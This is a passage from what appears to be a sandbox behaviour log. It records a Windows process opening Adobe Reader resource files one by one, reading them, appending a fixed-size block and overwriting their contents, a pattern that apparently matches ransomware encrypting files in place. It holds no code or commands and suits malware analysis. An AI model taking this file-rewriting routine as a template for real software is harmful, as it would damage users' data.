lpMultiByteStr="rus101.hsp", lpUsedDefaultChar=0x0) returned 10 [0114.793] ReadFile (in: hFile=0x20c, lpBuffer=0x28a79a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x28a79a8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0114.824] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6fad2 [0114.825] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.830] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6fad2 [0114.830] WriteFile (in: hFile=0x20c, lpBuffer=0x1e953d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.831] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0114.831] WriteFile (in: hFile=0x20c, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.831] CloseHandle (hObject=0x20c) returned 1 [0114.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.833] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.833] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5c00 [0114.833] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.833] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.833] ReleaseMutex (hMutex=0x168) returned 1 [0114.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slo.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slo.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="slo.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.833] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.837] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4c00 [0114.837] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.842] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4c00 [0114.842] WriteFile (in: hFile=0x20c, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.843] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0114.843] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.843] CloseHandle (hObject=0x20c) returned 1 [0114.843] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.844] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.845] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1c00 [0114.845] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.845] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.845] ReleaseMutex (hMutex=0x168) returned 1 [0114.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spn.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spn.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spn.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.845] ReadFile (in: hFile=0x20c, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x311f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0114.852] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0114.853] WriteFile (in: hFile=0x20c, lpBuffer=0x1e953d8*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesWritten=0x311f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0114.854] CloseHandle (hObject=0x20c) returned 1 [0114.854] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd58.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd58.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.855] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.855] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x10f800 [0114.855] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.856] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.856] ReleaseMutex (hMutex=0x168) returned 1 [0114.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="swd58.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="swd58.ths", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swd58.ths", lpUsedDefaultChar=0x0) returned 9 [0114.856] ReadFile (in: hFile=0x20c, lpBuffer=0x28a79a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x28a79a8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0114.862] ReadFile (in: hFile=0x20c, lpBuffer=0x28a79a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x28a79a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.870] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x10e800 [0114.870] ReadFile (in: hFile=0x20c, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.951] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x10e800 [0114.951] WriteFile (in: hFile=0x20c, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.951] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0114.952] WriteFile (in: hFile=0x20c, lpBuffer=0x28a79a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a79a8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0114.952] WriteFile (in: hFile=0x20c, lpBuffer=0x28a79a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a79a8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.952] CloseHandle (hObject=0x20c) returned 1 [0114.952] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa37.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0114.954] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.954] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x15800 [0114.954] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0114.954] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.954] ReleaseMutex (hMutex=0x168) returned 1 [0114.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="usa37.hyp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="usa37.hyp", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usa37.hyp", lpUsedDefaultChar=0x0) returned 9 [0114.954] ReadFile (in: hFile=0x20c, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0114.985] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x14800 [0114.985] ReadFile (in: hFile=0x20c, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.013] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x14800 [0115.013] WriteFile (in: hFile=0x20c, lpBuffer=0x1e953d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.014] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0115.014] WriteFile (in: hFile=0x20c, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0115.014] CloseHandle (hObject=0x20c) returned 1 [0115.014] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\symbol.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0115.028] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.028] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x288d [0115.028] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.028] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.029] ReleaseMutex (hMutex=0x168) returned 1 [0115.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="symbol.txt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="symbol.txt", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="symbol.txt", lpUsedDefaultChar=0x0) returned 10 [0115.029] ReadFile (in: hFile=0x20c, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.093] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x188d [0115.093] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.136] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x188d [0115.136] WriteFile (in: hFile=0x20c, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.137] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0115.137] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.137] CloseHandle (hObject=0x20c) returned 1 [0115.137] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\cyrillic.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0115.138] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.138] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3478 [0115.138] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.138] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.138] ReleaseMutex (hMutex=0x168) returned 1 [0115.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CYRILLIC.TXT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CYRILLIC.TXT", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CYRILLIC.TXT", lpUsedDefaultChar=0x0) returned 12 [0115.138] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.443] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2478 [0115.444] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.454] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2478 [0115.454] WriteFile (in: hFile=0x20c, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.454] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0115.454] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.454] CloseHandle (hObject=0x20c) returned 1 [0115.454] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\romanian.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0115.455] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.455] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x39c8 [0115.455] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.455] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.455] ReleaseMutex (hMutex=0x168) returned 1 [0115.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROMANIAN.TXT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROMANIAN.TXT", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ROMANIAN.TXT", lpUsedDefaultChar=0x0) returned 12 [0115.455] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.464] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x29c8 [0115.464] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.471] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x29c8 [0115.472] WriteFile (in: hFile=0x20c, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.472] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0115.474] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.474] CloseHandle (hObject=0x20c) returned 1 [0115.474] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1253.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0115.477] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.477] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2414 [0115.477] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.477] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.477] 